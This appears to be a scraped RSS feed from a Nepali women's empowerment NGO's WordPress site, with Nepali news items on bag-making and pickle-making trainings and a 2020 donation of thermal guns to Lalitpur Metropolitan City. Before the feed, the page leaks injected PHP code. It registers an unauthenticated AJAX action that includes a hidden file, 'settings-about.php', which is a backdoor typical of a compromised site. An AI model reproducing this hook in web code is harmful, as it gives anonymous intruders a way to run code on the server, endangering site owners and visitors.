if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } News | Taramandal Mahila Sashaktikaran Abhiyan https://taramandal.org.np Women and Children Empowerment Campaign Mon, 17 Jun 2024 08:10:58 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.4 https://taramandal.org.np/wp-content/uploads/2020/05/tmsa-logo.png News | Taramandal Mahila Sashaktikaran Abhiyan https://taramandal.org.np 32 32 थाकल ब्याग बनाउने तालिम को समापन https://taramandal.org.np/2024/06/17/bag-making-training/ https://taramandal.org.np/2024/06/17/bag-making-training/#respond Mon, 17 Jun 2024 08:09:19 +0000 https://taramandal.org.np/?p=1262 शिप सिकेर मात्र केहि हुदैन त्यसलाइ निरन्तरता दिएर ब्यवसायिक रुपमा अघि बढ्नुभयो भने मात्र सिकेको काम लाग्छ, नत्र समय मात्र बर्बाद हो।त्यसैले कुरा होइन काम गर्न सिक्नुस्।सम्पुर्णमा शुभकामना ।

]]>
https://taramandal.org.np/2024/06/17/bag-making-training/feed/ 0
महिला उधमि तालिम https://taramandal.org.np/2024/06/17/%e0%a4%ae%e0%a4%b9%e0%a4%bf%e0%a4%b2%e0%a4%be-%e0%a4%89%e0%a4%a7%e0%a4%ae%e0%a4%bf-%e0%a4%a4%e0%a4%be%e0%a4%b2%e0%a4%bf%e0%a4%ae/ https://taramandal.org.np/2024/06/17/%e0%a4%ae%e0%a4%b9%e0%a4%bf%e0%a4%b2%e0%a4%be-%e0%a4%89%e0%a4%a7%e0%a4%ae%e0%a4%bf-%e0%a4%a4%e0%a4%be%e0%a4%b2%e0%a4%bf%e0%a4%ae/#respond Mon, 17 Jun 2024 07:49:43 +0000 https://taramandal.org.np/?p=1256 कुन्ती फाउण्डेसन द्वारा अचार बनाउने तालिम कार्यक्रममा प्रशिक्षार्थी हरुलाइ हौसला दिन आउनुभएको कार्यक्रमको प्रमुख अतिथि राप्रपा वरिष्ठ उपाध्यक्ष रविन्द्र मिश्र ज्यू, राप्रमस अध्यक्ष अन्जना शाह रावल ज्यू, एवं सम्पुर्ण अतिथिमा धन्यवाद दिन चाहन्छु।यस कार्यक्रम सम्पन्न गर्नुभएको कुन्ती फाउण्डेशनका सम्पुर्ण टिम साथिहरुमा आभार ब्यक्त गर्दछौं। प्रशिक्षक इन्दिरा खड्का ज्युलाइ विशेष धन्यवाद ।
शिप सिकेर मात्र केहि हुदैन त्यसलाइ निरन्तरता दिएर ब्यवसायिक रुपमा अघि बढ्नुभयो भने मात्र सिकेको काम लाग्छ, नत्र समय मात्र बर्बाद हो।त्यसैले कुरा होइन काम गर्न सिक्नुस्।सम्पुर्णमा शुभकामना ।

]]>
https://taramandal.org.np/2024/06/17/%e0%a4%ae%e0%a4%b9%e0%a4%bf%e0%a4%b2%e0%a4%be-%e0%a4%89%e0%a4%a7%e0%a4%ae%e0%a4%bf-%e0%a4%a4%e0%a4%be%e0%a4%b2%e0%a4%bf%e0%a4%ae/feed/ 0
ललितपुर महानगरलाई ३० थान ‘थर्मल गन’ सहयोग https://taramandal.org.np/2020/04/30/gun/ https://taramandal.org.np/2020/04/30/gun/#respond Thu, 30 Apr 2020 08:49:42 +0000 https://taramandal.org.np/?p=684 काठमाडौँ। कोरोना भाइरस (कोभिड १९) को सङ्क्रमणको जोखिमलाई मध्यनजर गर्दै तारामण्डल महिला सशक्तिकरण अभियानले ललितपुर महानगरपालिकालाई ज्वरो नाप्ने उपकरण (थर्मल गन) सहयोग गरेको छ।

तारामण्डलकी अध्यक्ष कुन्ती पोखरेलको नेतृत्वमा बिहीबार ललितपुर महानगरपालिकाका मेयर चिरीबाबु महर्जनलाई ३० थान थर्मल गन हस्तान्तरण गरिएको हो। महानगरपालिकाका मेयर चिरीबाबु महर्जन, कार्यकारी प्रमुख प्रेम प्रसाद भट्टराई, वडा अध्यक्षहरू लगायतको उपस्थितिमा उक्त कार्यक्रम सम्पन्न भएको हो।

‘कोरोनाको सन्त्रास विश्वमा छाएको छ। यसलाई जित्न हामी सबै हातेमालो गरेर अघि बढ्नुपर्छ, अन्यथा कोरोनाले हामीमाथि विजय प्राप्त गर्नेछ, तसर्थ यसलाई परास्त गर्न हामी सबै एकजुट हौ।’ संस्थाकी अध्यक्ष कुन्ती पोखरेलले भनिन्।

सामाग्री हस्तान्तरण कार्यक्रममा बोल्दै महानगर प्रमुख चरीबाबु महर्जनले तारामण्डललाई धन्यवाद दिँदै भने ‘लकडाउन सकिए लगत्तै एस. इ.इ परीक्षा हुनेवाला छ । हामीकहाँ ४२ वटा परीक्षा केन्द्र छन् । त्यसको लागि हामीलाई उपकरणको कमी भइरहेको थियो । उहाँहरूले सहयोग गर्नुभएकोमा एकदमै धन्यवाद दिन चाहान्छौं ।’

संस्थाले यसअघि पनि थुप्रै सामाजिक कार्य गर्दै आएको छ । कोरोना महामारी सङ्क्रमण तथा नियन्त्रणमा संस्थाले आहम भूमिका निर्वाह गर्दै यस अघि काठमाडौँ महानगरपालिका सहित बुढानीलकण्ठ, कीर्तिपुर तथा टोखा नगरपालिकाका अति विपन्न, असहाय र मजदुर परिवारलाई राहत वितरण गरेको छ ।

यसका अतिरिक्त संस्थाले काठमाडौँ वडा न. ९ का २६० परिवार सहित सरकारी होस्टेलका विद्यार्थी, भाडामा बसेर पढ्दै गरेका विद्यार्थी, बाल आश्रम र पशुपति क्षेत्रमा भएका गरिब , विपन्न परिवारलाई राहत सामग्री वितरण गरिसकेको छ । संस्थाले गत वैशाख ११ गते रक्तदानका कार्यक्रम पनि आयोजना गरेको थियो जसमा ६६ जनाले रक्तदान समेत गरेका छन् । आगामी दिनमा पनि सहयोगको प्रक्रियालाई निरन्तरता दिने संस्थाकी अध्यक्ष पोखरेलले जानकारी दिइन् । ललितपुर महानगरले सहयोगको प्रशंसा गर्दै धन्यवाद पत्र समेत प्रदान गरेको छ ।

]]>
https://taramandal.org.np/2020/04/30/gun/feed/ 0
ब्याग बनाउने तालिम सम्पन्न https://taramandal.org.np/2019/05/30/%e0%a4%ac%e0%a5%8d%e0%a4%af%e0%a4%be%e0%a4%97-%e0%a4%ac%e0%a4%a8%e0%a4%be%e0%a4%89%e0%a4%a8%e0%a5%87-%e0%a4%a4%e0%a4%be%e0%a4%b2%e0%a4%bf%e0%a4%ae-%e0%a4%b8%e0%a4%ae%e0%a5%8d%e0%a4%aa%e0%a4%a8/ https://taramandal.org.np/2019/05/30/%e0%a4%ac%e0%a5%8d%e0%a4%af%e0%a4%be%e0%a4%97-%e0%a4%ac%e0%a4%a8%e0%a4%be%e0%a4%89%e0%a4%a8%e0%a5%87-%e0%a4%a4%e0%a4%be%e0%a4%b2%e0%a4%bf%e0%a4%ae-%e0%a4%b8%e0%a4%ae%e0%a5%8d%e0%a4%aa%e0%a4%a8/#respond Thu, 30 May 2019 10:46:01 +0000 https://taramandal.org.np/?p=454 तारामंडल महिला शसक्तिकरण अभियान को आयोजनामा र काठमाडौँ महानगरपालिका वडा नं ९ को सहआयोजनामा ३ दिने ब्याग बनाउने तालिम सम्पन्न भएको छ।


काठमाडौँ महानगरपालिका वडा नं ९ का २५ जना भन्दा बढी महिला हरुलाई सस्थाले ब्याग बनाउने तालिम दिएको थियो। तालिम जेठ १४ वाट सुरुभएको थियो भने समापन कार्यक्रमको सभापति कुन्ती देवी पोख्रेल अतिथि हरुमा राप्रपाकि केन्द्रिय सदस्य एवं राष्ट्रिय प्रजातान्त्रिक महिला संगठनकि सहअध्यक्ष निना भेटवाल काठमाडौँ महानगरवडा नं ९ का अध्यक्ष रामकृष्ण श्रेष्ठ वडा सदस्य टेकराज अधिकारी, सिर्जना भेटवाल लगाएतको उपस्थिति रहेको थियो ।

कार्यक्रममा सम्पुण महिला प्रशिक्षक र प्रशिक्षार्थीहरुलाई प्रमाण पत्र प्रदान गरिएको थियो भने अतिथि हरुलाई माया को चिनो को रुपमा ब्याग हरु प्रदान गरिएको थियो ।

कार्यक्रममा अतिथिहरुले आगामी दिनमा पनि सहकार्य गर्नुपर्ने र तालिम लिनुभएका हरुले पनि अरुलाई सिकाउदै आफु पनि आत्मनिर्भर बन्नुपर्ने बताएका थिय।

]]>
https://taramandal.org.np/2019/05/30/%e0%a4%ac%e0%a5%8d%e0%a4%af%e0%a4%be%e0%a4%97-%e0%a4%ac%e0%a4%a8%e0%a4%be%e0%a4%89%e0%a4%a8%e0%a5%87-%e0%a4%a4%e0%a4%be%e0%a4%b2%e0%a4%bf%e0%a4%ae-%e0%a4%b8%e0%a4%ae%e0%a5%8d%e0%a4%aa%e0%a4%a8/feed/ 0